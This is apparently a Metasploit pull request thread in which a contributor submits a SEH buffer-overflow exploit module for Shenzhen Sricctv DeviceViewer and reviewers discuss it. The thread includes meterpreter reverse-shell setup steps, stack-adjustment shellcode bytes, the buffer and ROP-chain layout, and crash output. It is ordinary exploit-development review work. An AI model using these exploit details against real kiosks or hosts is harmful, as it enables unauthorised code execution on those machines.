Added DeviceViewer Stack Buffer Overflow Exploit
rapid7/metasploit-framework pull request #13309
Opened 2020-04-22 17:36 UTC by VoidSec

Add Shenzhen Sricctv Technology DeviceViewer User Field Stack Buffer Overlow
- CVE-2019-11563

`This exploits a SEH stack buffer overflow in DeviceViewer v.3.10.12.0 present in the username login field. In the "User" login field paste the content of the generated exploit and press "Login". 
This module will bypass DEP and ASLR. 

It was successfully tested on Windows 10, Windows 7 and Windows XP SP3.`

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/fileformat/device_viewer`
- [ ] `set payload windows/meterpreter/reverse_tcp`
- [ ] `set lhost IP`
- [ ] run
- [ ] `DeviceViewer_v.3.10.12.0_exploit.txt` should be created in user's local msf folder (/home/user/.msf4/local/DeviceViewer_v.3.10.12.0_exploit.txt)
- [ ] Open DeviceViewer
- [ ] In the "User" field paste the content of `DeviceViewer_v.3.10.12.0_exploit.txt` and press "Login"
- [ ] Verify that the handler received the newly created 

![device_viewer](https://user-images.githubusercontent.com/5717603/80014330-6f160700-84d0-11ea-90aa-cc47a4343497.png)
session

PS: it's my first pull, so please, point out everything I should improve and/or change :)

2020-04-22 18:22 UTC, gwillcox-r7 commented
@VoidSec Please add module documentation using the guides above. Of particular interest for us is the steps to obtain the vulnerable software, and what scenarios you tested it under and the steps required to set up the software for testing. This will help us ensure that we are able to test out your PR and get it landed quicker :)

2020-04-23 03:08 UTC, wvu-r7 commented on modules/exploits/windows/fileformat/device_viewer.rb
> +      buffer << "\x81\xc4\x24\xfa\xff\xff" # stack adj
Can you use `StackAdjustment` here? It's prefixed to the payload, so it looks like you can.

```
wvu@kharak:~$ echo -n $'\x81\xc4\x24\xfa\xff\xff' | ndisasm -b 64 -
00000000  81C424FAFFFF      add esp,0xfffffa24
wvu@kharak:~$ echo $((0xfffffa24 - 0xffffffff - 1))
-1500
wvu@kharak:~$
```

You're even packing in the same value everyone cargo-cults. :-)

2020-04-23 03:10 UTC, wvu-r7 commented on modules/exploits/windows/fileformat/device_viewer.rb
> +      buffer << "\x81\xc4\x24\xfa\xff\xff" # stack adj
If not, I would document the instruction this decodes to.

2020-04-23 03:18 UTC, wvu-r7 commented on modules/exploits/windows/fileformat/device_viewer.rb
> +      buffer << "\x81\xc4\x24\xfa\xff\xff" # stack adj
```
[1] pry(#<Msf::Framework>)> Rex::Text.to_hex_dump(Rex::Arch.adjust_stack_pointer(ARCH_X86, -1500)) # ARCH_X64 isn't "supported"
=> "81 c4 24 fa ff ff    |..$...|\n\n"
[2] pry(#<Msf::Framework>)>
```

Same encoding.

2020-04-23 07:11 UTC, VoidSec commented on modules/exploits/windows/fileformat/device_viewer.rb
> +      buffer << "\x81\xc4\x24\xfa\xff\xff" # stack adj
Sure, I will try to update and see if it's still working as expected.
I should prefer the `StackAdjustment` option instead of the inline `Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp, -155").encode_string` because it is faster, right?

2020-04-23 08:15 UTC, VoidSec commented
@gwillcox-r7 documentation has been pushed, hope that's ok
@wvu-r7 `StackAdjustment` option has been added, I've also verified that it's working as expected

2020-04-23 14:23 UTC, gwillcox-r7 commented on modules/exploits/windows/fileformat/device_viewer.rb
> +      buffer << "\x81\xc4\x24\xfa\xff\xff" # stack adj
@VoidSec Actually the StackAdjustment option is more flexible than hardcoding an offset into your payload. It allows you to have multiple targets and then adjust the stack offset required depending on which system you are targeting. This is generally good practice as it allows the exploit to be more portable and is a good habit to get into.

2020-04-23 15:16 UTC, gwillcox-r7 commented
@VoidSec I am having a bit of a hard time understanding this bug, mind helping me out?

Correct me if I'm wrong this sounds like this bug would require me to first have access to the affected machine as a local user. Then I would copy the contents of the generated file into the `Username` field of the app and log in. The resulting code will then execute with the privileges of the user that I logged in as. I believe this may have been why CVE rejected this vulnerability. See https://nvd.nist.gov/vuln/detail/CVE-2019-11563 and https://www.tenable.com/cve/CVE-2019-11563

If this is the case I am failing to see how this is adding value as we already have arbitrary code execution as the user that we are compromising. Unless the software is available to all users on the system, I don't see a path whereby a user can somehow gain additional permissions, which is what we would need to see if we were to merge this into the framework.

2020-04-23 16:27 UTC, VoidSec commented
@gwillcox-r7 I'll try to add a bit of context to this vulnerability explaining my scenario. While working on an internal PT I found an entire series of machines, configured in a "kiosk" mode, where the operator was directly logged-in Windows and the DeviceViewer software GUI automatically came up. Operator was now able to insert is personal user/passwd and view all the connected CCTV.

Exploiting this specific vulnerability was the only option I had to "escape" the kiosk mode and gain access to the underlying OS, even if with "low" privileges was the path to gain further access to client's network.

2020-04-23 16:34 UTC, wvu-r7 commented on modules/exploits/windows/fileformat/device_viewer.rb
> +      buffer << "\x81\xc4\x24\xfa\xff\xff" # stack adj
Awesome, glad it worked!

2020-04-23 16:35 UTC, wvu-r7 commented on modules/exploits/windows/fileformat/device_viewer.rb
> +      buffer << "\x81\xc4\x24\xfa\xff\xff" # stack adj
`StackAdjustment` might even be faster because it doesn't use Metasm. But I wouldn't worry about it. :)

2020-04-23 21:49 UTC, gwillcox-r7 commented
@VoidSec Hmm interesting but most Kiosks are fairly locked down, particularly with their keyboard layout. I'm curious that given this is outputting content to a file which is then expected to be copied into the `Username` prompt of the login prompt, how exactly you are copying the content across given these restrictions.

Really we are trying to get a clearer view on the full exploit path given your scenario. For example if we could deliver the payload via web and then copy it into the login prompt, that might be something to consider.

At present you haven't really provided many details regarding the full exploitation path so its a little hard for us to judge some of the qualities of this exploit given that right now it seems its main benefit would be in escaping from restricted environments like a Kiosk and getting an initial foothold on a network. Additionally I'm also a bit unclear as given the installer that was provided on Exploit-DB for this software, there is no indication that it needs to be set up on a kiosk or similar, which means that most people most likely won't be installing this on a kiosk (unless I'm missing some documentation elsewhere which indicates otherwise, in which case please point me to the documentation indicating otherwise and I'll be happy to confirm).

That being said I do appreciate you providing a real world example as this definitely shows us that there is a valid use case for something like this; we just need a bit more clarity on things.

2020-04-24 07:41 UTC, VoidSec commented
@gwillcox-r7 In my specific case I had 2 options:

1. deliver the payload via the Microsoft on Screen Keyboard (it was a atouchscreen kiosk), given the fact that the payload can be full ASCII printable. But it is quite tedious
2. deliver the payload writing it down on a badge that was next read by a scanner in order to fill the operator login information.

Unfortunately I cannot give out too many info on this specific setup as it was discovered during an internal penetration test... 

AFAIK, even if application does not directly mention to run it in kiosk mode (I'm also missing application's documentation) I think that's why it was made for based on the following evidence:

- application automatically set itself to be full screen
- application has a lock feature and password "protected" settings
- different users and permissions management

2020-05-05 19:59 UTC, gwillcox-r7 requested changes
Overall not a bad job, but there are some areas that need fixing or further clarification.

2020-05-05 19:59 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/fileformat/device_viewer.md
> +This module exploits a SEH stack buffer overflow in DeviceViewer version 3.10.12.0. By creating a specially crafted file and copying its content in the "User" login field, an attacker will be able to
Have you tested previous versions or versions other than 3.10.12.0? I don't see any files online or elsewhere and it seems odd that it would just affect this specific version.

Also gain arbitrary code execution as which user? Do we need to log in first to the computer to access the software? You aren't very clear on what is gained and what is needed to access this target for exploitation, so this needs to be cleared up.

Finally I'm not sure mentioning copying the content to a file is needed. You could copy it to the clipboard and so long as you could copy and paste it into that `User` login field it would be fine, so this description may make people think that the file is a required part of the exploitation process when really its not.

2020-05-05 19:59 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/fileformat/device_viewer.md
> +Link to vulnerable software [EDB](https://www.exploit-db.com/apps/4d10486a079bd1f1864c30e86cd2aa80-DeviceViewer.exe) - [VoidSec](https://github.com/VoidSec/Exploit-Development/blob/master/windows/x86
Thanks for including these links, and also saving it locally to your repo, this is very helpful for testers!

2020-05-05 19:59 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/fileformat/device_viewer.md
> +  * Windows XP SP3 Pro x64 (DEP & ASLR disabled) - trigger
I'm confused by this section. First off, you should have a `## Verification Steps` section here, and I'm not seeing one. Take a look at https://github.com/rapid7/metasploit-framework/pull/13200/files and the file `documentation/modules/exploit/windows/local/ntusermndragover.md` for a look at how one of these files should be formatted.

More importantly though, I am very confused why you mention that DEP and ASLR was disabled for the older versions but not for the newer one, particularly given your exploit description that this exploit bypasses ASLR and DEP and that the exploit description, as it stands at the moment, seems to imply that you can bypass ASLR and DEP on all targets without having to disable it.

Can you please clarify this ASLR + DEP requirement for all targets more? Is it that the program doesn't have ASLR or DEP enabled? That Windows 10 forces these settings? That you manually changed the settings? Its not clear from this description.

As this section will need to be removed anyway, please just type your response in a comment below.

2020-05-05 19:59 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/fileformat/device_viewer.md
> +### DeviceViewer v.3.10.12.0 on Windows 10 (Pro x64 v.1909 Build 18363.720, DEP & ASLR enabled)
Given this exploit targets multiple systems, I would expect you to have two other scenarios showing the exploit being tested against Windows XP SP3 and WIndows 7 SP1, as you noted these targets were also tested. Please update the `# Scenarios` section with the result of testing these target.

2020-05-05 19:59 UTC, gwillcox-r7 commented on modules/exploits/windows/fileformat/device_viewer.rb
> +          'BadChars' => "\x81\xc4\x24\xfa\xff\xff",
Wouldn't \x00 also be a bad character considering this is essentially an ASCII string your copying? What about \x0a and \x0d?

2020-05-05 19:59 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/fileformat/device_viewer.md
> +msf5 exploit(multi/handler) > show options
Remove this and the output shown below, it isn't helpful as you haven't set any options yet.

2020-05-05 19:59 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/fileformat/device_viewer.md
> +msf5 exploit(multi/handler) > run
Show the output from `show options` here before you execute the `run` command.

2020-05-05 19:59 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/fileformat/device_viewer.md
> +sf5 exploit(windows/fileformat/device_viewer) > use exploit/multi/handler
From here on down is confusing. Shouldn't there be the shell connecting back? You haven't offered any evidence of this here and from the looks of things all I see is you trying to set up the same options you attempted to set up before but not getting a shell back; the documentation should be a clean copy of your setup, getting a shell, and then a `sysinfo` and `whoami` command to show what the system is as well as who you are running as.

2020-05-05 19:59 UTC, gwillcox-r7 commented on modules/exploits/windows/fileformat/device_viewer.rb
> +        This exploits a SEH stack buffer overflow in DeviceViewer v.3.10.12.0 present in the
Again, as per above, I don't think this bug would only apply to version 3.10.12.0. Do you have any versions you can test on?

2020-05-05 19:59 UTC, gwillcox-r7 commented on modules/exploits/windows/fileformat/device_viewer.rb
> +          [ 'CVE', '2019-11563' ],
I question this slightly if only because it was rejected by the CNA. Will need to see what our stance is on this one. Pinged @todb-r7 and will await his response to see what to do with this one.

2020-05-05 19:59 UTC, gwillcox-r7 commented on modules/exploits/windows/fileformat/device_viewer.rb
> +      'DisclosureDate'  => 'Apr 25 2019',
Where is this from? As far as I can tell the original disclosure date, looking at the history on https://nvd.nist.gov/vuln/detail/CVE-2019-11563#VulnChangeHistorySection, was on 5/10/2019,  which would mean `Apr 10 2019` would be more appropriate.

2020-05-05 19:59 UTC, gwillcox-r7 commented on modules/exploits/windows/fileformat/device_viewer.rb
> +    # plain SEH exploit
Again not sure why DEP+ASLR is disabled on Windows 7 and Windows XP SP3 but not Windows 10 even though the target is the same version. Mind clarifying this a bit more?

2020-05-05 19:59 UTC, gwillcox-r7 commented on modules/exploits/windows/fileformat/device_viewer.rb
> +    # | garbage (254) | nSEH (4) | SEH (4) | filler (384) | rop chain (92) | stack adj (6) | shellcode (371) | filler (4000-len(buff)) |
Great comments here, well done on visualizing this and explaining how it all works!

2020-05-05 19:59 UTC, gwillcox-r7 commented on modules/exploits/windows/fileformat/device_viewer.rb
> +    print_status("Trying target #{target.name}...")
This output line isn't really needed or very clear. I would remove it.

2020-05-05 20:10 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/fileformat/device_viewer.md
> +Link to vulnerable software [EDB](https://www.exploit-db.com/apps/4d10486a079bd1f1864c30e86cd2aa80-DeviceViewer.exe) - [VoidSec](https://github.com/VoidSec/Exploit-Development/blob/master/windows/x86
Your link is actually to 3.12.0.1. So.....yeah....its not the right version?

2020-05-05 20:13 UTC, todb-r7 commented on modules/exploits/windows/fileformat/device_viewer.rb
> +          [ 'CVE', '2019-11563' ],
Hi there! Doing a little bit of poking around on this CVE. Here's the decision point as I see it, @VoidSec, and I would love your opinion here.

1) Is this a typo? If so, that should be fixed to point to the correct CVE.

2) Are you asserting with this Metasploit module that CVE-2019-11563 should *not* have been revoked, and is, in fact, a real vulnerability? If so, I can make that case to the CVE Editorial Board. If the Metasploit module works and actually exploits whatever CVE-2019-11563 is, then that's a pretty good argument for reinstating the vulnerability. The turnaround should be pretty quick, so if this is the intent, hang out for a day or two and I'll update here.

3) Is it, in fact, *not* a vulnerability, and the Metasploit module is merely exercising functionality? This is the "it's a feature, not a bug" argument someone may have made. If this is the case, then you should not reference the revoked CVE (but perhaps reference something else discussing the issue -- this comment thread would be a fine link to use in that case).

I think that's it I'd love to hear your thoughts.

2020-05-05 20:16 UTC, todb-r7 commented on modules/exploits/windows/fileformat/device_viewer.rb
> +          [ 'CVE', '2019-11563' ],
For reference, here's the old CVE ID text from MITRE:

https://github.com/CVEProject/cvelist/commit/1741608c1622dc167e0a4225961adef78242f96f#diff-f3fa48408a75a208f8ac44aa4c1c89a3

2020-05-05 20:22 UTC, gwillcox-r7 commented
> @gwillcox-r7 In my specific case I had 2 options:
> 
> 1. deliver the payload via the Microsoft on Screen Keyboard (it was a touchscreen kiosk), given the fact that the payload can be full ASCII printable. But it is quite tedious
> 2. deliver the payload writing it down on a badge that was next read by a scanner in order to fill the operator login information.
> 
> Unfortunately I cannot give out too many info on this specific setup as it was discovered during an internal penetration test...
> 
> AFAIK, even if application does not directly mention to run it in kiosk mode (I'm also missing application's documentation) I think that's why it was made for based on the following evidence:
> 
> * application automatically set itself to be full screen
> * application has a lock feature and password "protected" settings
> * different users and permissions management

Hmm you actually have a good point here in some reguards, however you can close the app with the X in the upper right so I'm not 100% convinced its a Kiosk app by default. Definitely does show some signs of being one though :)

Also I noticed this app opens up some ports to listen on. Have you seen if any of them allow logging in remotely? Might be possible to convert this to a remote bug if the same login logic is used.

2020-05-07 07:34 UTC, VoidSec commented on documentation/modules/exploit/windows/fileformat/device_viewer.md
> +This module exploits a SEH stack buffer overflow in DeviceViewer version 3.10.12.0. By creating a specially crafted file and copying its content in the "User" login field, an attacker will be able to
I didn't. That was the  installed  version on client's kiosk and the only version that I was able to recover online, I will search for more and let you know on this.

I've updated the documentation to reflect the fact that code execution happens in the context of currently logged-in user and that it is sufficient copying the crafted "Username" value in the `User` login field

2020-05-07 07:58 UTC, VoidSec commented on documentation/modules/exploit/windows/fileformat/device_viewer.md
> +  * Windows XP SP3 Pro x64 (DEP & ASLR disabled) - trigger
I've double checked:
  * Windows XP Pro x86 v.5.1.2600 SP 3 Build 2600: ASLR and DEP are disabled on default configuration
  * Windows 7 Pro x86 v.6.1.7601 SP 1 Build 7601: Windows enforce ASLR and DEP automatically on default configuration
  * Windows 10 Pro x64 v.1909 Build 18363.720: Windows enforce ASLR and DEP automatically on default configuration

I was probably testing it on a modified image that I made for testing purpose. I'll rework the exploit to reflect this changes and re-check all the offsets and ROP.

2020-05-07 08:10 UTC, VoidSec commented on documentation/modules/exploit/windows/fileformat/device_viewer.md
> +Link to vulnerable software [EDB](https://www.exploit-db.com/apps/4d10486a079bd1f1864c30e86cd2aa80-DeviceViewer.exe) - [VoidSec](https://github.com/VoidSec/Exploit-Development/blob/master/windows/x86
Sorry, from where 3.12.0.1 version was coming from? 
Because, if it's from the EDB link, the version mentioned in the EDB POC was wrong.

Downloading Device Viewer form EDB results in the tested version I've mentioned: 3.10.12.0
![DV_v](https://user-images.githubusercontent.com/5717603/81270275-c973a380-904a-11ea-843d-b00d58275f08.png)

2020-05-07 08:39 UTC, VoidSec commented on modules/exploits/windows/fileformat/device_viewer.rb
> +          [ 'CVE', '2019-11563' ],
Hi @todb-r7 sorry for the late reply. 
CVE-2019-11563 is correct, it's not a typo and with this module I'm asserting it should not have been revoked as it's a real vulnerability.
I've seen some emails going back and forth between you and MITRE and I think you are already working on reinstating this CVE, so, thank you!

2020-05-07 09:10 UTC, VoidSec commented
@gwillcox-r7 I'm working on all requested changes and I've replied were needed with additional info.
I'll also check opened ports and see if I'll be able to convert it into a remote exploit.
I'll expect a new commit before the end of the week or during the week end as I might be busy.

2020-05-07 09:56 UTC, VoidSec commented on modules/exploits/windows/fileformat/device_viewer.rb
> +          'BadChars' => "\x81\xc4\x24\xfa\xff\xff",
Good catch! That was the stack adjustment I had in my POC:
https://github.com/VoidSec/Exploit-Development/blob/82d884cdd0a1c0f29379d826a48ce74cc22a0e03/windows/x86/local/DeviceViewer_v.3.10.12.0/DeviceViewer_v.3.10.12.0.py#L98
While the bad chars are indeed `\x00\x0a\x0d`:
https://github.com/VoidSec/Exploit-Development/blob/82d884cdd0a1c0f29379d826a48ce74cc22a0e03/windows/x86/local/DeviceViewer_v.3.10.12.0/DeviceViewer_v.3.10.12.0.py#L101-L102

updated :)

2020-05-07 14:17 UTC, todb-r7 commented on modules/exploits/windows/fileformat/device_viewer.rb
> +          [ 'CVE', '2019-11563' ],
Indeed I am. More to come!

2020-05-07 14:41 UTC, gwillcox-r7 commented
> @gwillcox-r7 I'm working on all requested changes and I've replied were needed with additional info.
> I've noted the opened ports, I do not know what they are used for (I suspect they are needed to receive CCTV's UDP video stream), I'll check anyway.

For reference do you have the list of ports? Might help in identifying issues.

2020-05-07 15:11 UTC, VoidSec commented
@gwillcox-r7 Yep, here they are:

- UDP 11019; this one is randomized every execution of DeviceViewer
- UDP 51700; constant
- UDP 51880; constant

2020-05-07 15:43 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/fileformat/device_viewer.md
> +Link to vulnerable software [EDB](https://www.exploit-db.com/apps/4d10486a079bd1f1864c30e86cd2aa80-DeviceViewer.exe) - [VoidSec](https://github.com/VoidSec/Exploit-Development/blob/master/windows/x86
Hmm fair point and this is an odd one. I would say the file version would be more correct as generally we tend to trust those more over the installer version, but tbh I've never encountered this scenario. Very odd.

2020-05-07 15:46 UTC, gwillcox-r7 commented on modules/exploits/windows/fileformat/device_viewer.rb
> +          [ 'CVE', '2019-11563' ],
@todb can confirm that this is a real vuln, was able to corrupt the SEH handler on Windows 10 with the software version @VoidSec provided. I will try to provide some more evidence in a bit when I am finished reviewing these comments and will link it into this thread.

2020-05-07 15:48 UTC, gwillcox-r7 commented
@VoidSec I see you have noted a few of these issues are fixed but I don't think you pushed the changes up to your branch yet. Would you mind doing that? Know some of them you are still working on so thats okay. I can always squash the commits down later if needs be.

2020-05-07 16:04 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/fileformat/device_viewer.md
> +This module exploits a SEH stack buffer overflow in DeviceViewer version 3.10.12.0. By creating a specially crafted file and copying its content in the "User" login field, an attacker will be able to
Thanks appreciate your insight into this. If we can't find any more versions then we may just have to keep this as is as we don't have any further evidence to back up any additional claims, but would like to see that we have at least made an effort to locate other installers first.

As for your updates, sounds good, but I don't think you uploaded them to your branch so I don't see anything as having been changed in the code right now.

2020-05-07 16:05 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/fileformat/device_viewer.md
> +  * Windows XP SP3 Pro x64 (DEP & ASLR disabled) - trigger
Ok Windows XP sounds fine and I was half expecting that. That being said, as you mentioned Windows 7 should probably have the ASLR and DEP bypass if that is on in its default configuration.

Appreciate you posting this though, might be useful to note that ASLR and DEP are disabled on the Windows XP install by default in the documentation.

2020-05-07 16:07 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/fileformat/device_viewer.md
> +### DeviceViewer v.3.10.12.0 on Windows 10 (Pro x64 v.1909 Build 18363.720, DEP & ASLR enabled)
Marking this and others as applicable as unresolved until I can see changes uploaded which fix this @VoidSec

2020-05-07 16:18 UTC, VoidSec commented
Yep, I'm fixing the Win 7 ROP but I should have fixed all the "resolved" ones. I also had to restore my own `StackAdjustment` otherwise it would fail on Win10, I'll investigate that too

2020-05-08 09:16 UTC, VoidSec commented
@gwillcox-r7 Here we are, documentation has been updated will all test cases, I've fixed the Win7 ROP and now everything should be ready for your revision.
You should be able to close the requested changes, please, let me know if I have to change/fix/add anything :)

2020-05-08 15:47 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/fileformat/device_viewer.md
> +This module exploits a SEH stack buffer overflow in DeviceViewer version 3.10.12.0. By creating a specially crafted file and copying its content in the "User" login field, an attacker will be able to
Hmm just realized the title for this line should be `Shenzhen Sricctv Technology DeviceViewer` not just `DeviceViewer`. Only reason I'm asking for this is `DeviceViewer` could be used by other products as its a fairly common name so we want to make it clear who manufactures this product to avoid confusion.

2020-05-08 15:49 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/fileformat/device_viewer.md
> +### DeviceViewer v.3.10.12.0 on Windows 7 Pro x86 v.6.1.7601 SP 1 Build 7601 (Windows enforce ASLR and DEP automatically on default configuration)
Only comment here is a minor comment. Should be `enforces` not `enforce` for proper English grammar. Otherwise much better job on the version info here!

2020-05-08 15:49 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/fileformat/device_viewer.md
> +### DeviceViewer v.3.10.12.0  Windows 10 Pro x64 v.1909 Build 18363.720 (Windows enforce ASLR and DEP automatically on default configuration)
Only comment here is a minor comment. Should be `enforces` not `enforce` for proper English grammar. Otherwise much better job on the version info here!

2020-05-08 15:50 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/fileformat/device_viewer.md
> +### DeviceViewer v.3.10.12.0  Windows 10 Pro x64 v.1909 Build 18363.720 (Windows enforce ASLR and DEP automatically on default configuration)
Actually one other comment. Got an extra space before `Windows 10`. Can you remove this extra space?

2020-05-08 15:52 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/fileformat/device_viewer.md
> +### DeviceViewer v.3.10.12.0 on Windows 10 (Pro x64 v.1909 Build 18363.720, DEP & ASLR enabled)
Confirmed resolved, thanks for doing this @VoidSec!

2020-05-08 15:55 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/fileformat/device_viewer.md
> +  * Windows XP SP3 Pro x64 (DEP & ASLR disabled) - trigger
Can confirm that Windows 7 now has a ROP chain along with Windows 10. Will need to set up a Windows XP SP3 machine to confirm the Windows XP settings though, but rest looks good. Marking as resolved for now.

2020-05-08 15:57 UTC, gwillcox-r7 commented on modules/exploits/windows/fileformat/device_viewer.rb
> +          'BadChars' => "\x81\xc4\x24\xfa\xff\xff",
Thanks looks good!

2020-05-08 16:03 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/fileformat/device_viewer.md
> +Link to vulnerable software [EDB](https://www.exploit-db.com/apps/4d10486a079bd1f1864c30e86cd2aa80-DeviceViewer.exe) - [VoidSec](https://github.com/VoidSec/Exploit-Development/blob/master/windows/x86
Going to go with 3.10.12.0 for now as I haven't heard anything back from my teammates on this and I'd trust the actual file version a lot more than the installer.

2020-05-08 16:05 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/fileformat/device_viewer.md
> +msf5 exploit(multi/handler) > show options
Confirmed resolved.

2020-05-08 16:06 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/fileformat/device_viewer.md
> +msf5 exploit(multi/handler) > run
Confirmed resolved.

2020-05-08 16:07 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/fileformat/device_viewer.md
> +sf5 exploit(windows/fileformat/device_viewer) > use exploit/multi/handler
Much much better! Thanks for doing this @VoidSec :)

2020-05-08 16:10 UTC, gwillcox-r7 commented on modules/exploits/windows/fileformat/device_viewer.rb
> +      'DisclosureDate'  => 'Apr 25 2019',
Thanks confirmed this has been updated!

2020-05-08 16:11 UTC, gwillcox-r7 commented on modules/exploits/windows/fileformat/device_viewer.rb
> +    # plain SEH exploit
Clarified in another discussion and updates have been made to the exploit by @VoidSec to explain this better. Marking as resolved.

2020-05-08 16:14 UTC, gwillcox-r7 commented on modules/exploits/windows/fileformat/device_viewer.rb
> +    print_status("Trying target #{target.name}...")
@VoidSec Can you please remove this line rather than commenting it out? I can't ship this code if you just comment stuff out like this. Comments are meant to be for explanation, not for marking code to be skipped over. Same goes for other lines that you commented out rather than removing.

2020-05-08 16:21 UTC, gwillcox-r7 commented on modules/exploits/windows/fileformat/device_viewer.rb
> +        This exploits a SEH stack buffer overflow in DeviceViewer v.3.10.12.0 present in the
Hmm this is interesting. So looking at http://www.sricam.com/download/id/128545e0009f4d488e813c3330545dcf.html it seems that DeviceViewer may have become SRICAM CMS given how the software looks. I wonder if the software is still vulnerable to this issue?

2020-05-08 16:53 UTC, gwillcox-r7 commented on modules/exploits/windows/fileformat/device_viewer.rb
> +        This exploits a SEH stack buffer overflow in DeviceViewer v.3.10.12.0 present in the
Yep looks like its still vulnerable, even on the latest version, to the same bug:

```
(1b2c.1e60): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=750d4650 ecx=09500000 edx=09500000 esi=095c8540 edi=0000057e
eip=00ea5fb2 esp=091dd504 ebp=091dd840 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
CMSClient!AMR_Encode_Frame+0x44d22:
00ea5fb2 8378fc01        cmp     dword ptr [eax-4],1  ds:002b:4141413d=????????
0:000> !exchain
091dd834: 41414141
Invalid exception stack at 41414141
```

And ports open

```
  UDP    0.0.0.0:25143          *:*                                    2308
 [SricamPC.exe]
  UDP    0.0.0.0:55440          *:*                                    2308
 [SricamPC.exe]
```

2020-05-08 17:01 UTC, gwillcox-r7 commented on modules/exploits/windows/fileformat/device_viewer.rb
> +        This exploits a SEH stack buffer overflow in DeviceViewer v.3.10.12.0 present in the
@VoidSec The more I look into this vulnerability though the more I'm starting to question it. The problem is that unless you are in a Kiosk or some type of sandboxed situation you don't gain anything from exploiting this vuln. I thought the multiple user thing might be of interest as perhaps a local privilege elevation bug, but even logging in as a different local user and trying to access the software shows that each instance of the software runs on a per user basis and its only accessible to that user. In other words, there is no potential for elevating your privileges via a client/server model where the server is running with higher privileges.

Further the documentation above shows no evidence of this being kiosk or sandboxed software in normal installation circumstances, so I'm starting to think that your pentest was a nonstandard install of this software and not something more general, which would grant inclusion in the Metasploit Framework.

2020-05-08 17:29 UTC, gwillcox-r7 commented on modules/exploits/windows/fileformat/device_viewer.rb
> +        This exploits a SEH stack buffer overflow in DeviceViewer v.3.10.12.0 present in the
@VoidSec To be clear we are definitely interested in this particularly as it does affect the latest version, but we are just struggling to see how this would be used outside of limited scenarios. This is why we were asking for more details on when this would be useful. Can you provide a video or similar demonstrating your use case so that we can better understand this module and make a final judgement call?

2020-05-08 17:59 UTC, jmartin-r7 commented
@msjenkins-r7 test this please.

2020-05-11 08:18 UTC, VoidSec commented on modules/exploits/windows/fileformat/device_viewer.rb
> +          'BadChars' => "\x81\xc4\x24\xfa\xff\xff",
@gwillcox-r7 Maybe It's just my misunderstanding of what MSF `StackAdjustment` does, but I was expecting it to increment ESP as the very first instruction before everything else. Something that with the `StackAdjustment` option it's not happening but that's needed as, otherwise, the GetPC routine will corrupt the payload below.

That's why I was using my hardcoded code

2020-05-11 08:30 UTC, VoidSec commented on modules/exploits/windows/fileformat/device_viewer.rb
> +        This exploits a SEH stack buffer overflow in DeviceViewer v.3.10.12.0 present in the
@gwillcox-r7 I know that SRICAM CMS is also vulnerable as I was in the process of requesting a CVE number for it.

Unfortunately, I cannot provide a video or further PoC on this :(

If anyone is willing to help me trying to understand if we can make it a remote bug...

2020-05-11 08:31 UTC, VoidSec commented
@gwillcox-r7 fixed the English typos

2020-05-11 14:30 UTC, gwillcox-r7 commented on modules/exploits/windows/fileformat/device_viewer.rb
> +    print_status("Trying target #{target.name}...")
Confirmed fixed. Marking resolved.

2020-05-11 14:33 UTC, gwillcox-r7 commented on modules/exploits/windows/fileformat/device_viewer.rb
> +        This exploits a SEH stack buffer overflow in DeviceViewer v.3.10.12.0 present in the
`Shenzhen Sricctv Technology DeviceViewer`. Might also want to change this in your Scenarios section of your documentation as well.

2020-05-11 14:33 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/fileformat/device_viewer.md
> +This module exploits a SEH stack buffer overflow in DeviceViewer version 3.10.12.0. By creating a specially crafted file and copying its content in the "User" login field, an attacker will be able to
Confirmed this instance is fixed @VoidSec, but still a few others instances that need fixing.

2020-05-11 14:59 UTC, VoidSec commented on modules/exploits/windows/fileformat/device_viewer.rb
> +        This exploits a SEH stack buffer overflow in DeviceViewer v.3.10.12.0 present in the
now fixed :)

2020-05-11 15:50 UTC, gwillcox-r7 commented on modules/exploits/windows/fileformat/device_viewer.rb
> +          [ 'CVE', '2019-11563' ],
@todb-r7 @VoidSec Going to close convo this as I demo'd to @todb-r7 that the crash does indeed happen via a video call, but it requires a copy and paste as the local user to then crash the app as the local user.

There appears to be no way to get this to exploit the app running as another user, which is severely limiting the impact of this vulnerability at the moment. If it was the case that another user was running this app and we could connect to it locally, then there might be a possibility for a local privilege elevation, but given these circumstances, this does not appear to be possible.

Therefore at the moment the only benefit of exploiting this bug is gaining privileges as the current user that you are already running as, which is probably why this CVE was rejected as not a security bug.

For this reason, @todb-r7 did an update to this module to comment the CVE number out of this module as it currently doesn't seem to be a security issue and @todb-r7 therefore feels it was right, given the current information, that this CVE was rejected (again no evidence of a security issue given current information).

If we can transform this into a remote bug then we can argue the case again, but otherwise I think its best we remove the CVE ID for now given the circumstances.

2020-05-11 15:55 UTC, gwillcox-r7 commented on modules/exploits/windows/fileformat/device_viewer.rb
> +        This exploits a SEH stack buffer overflow in DeviceViewer v.3.10.12.0 present in the
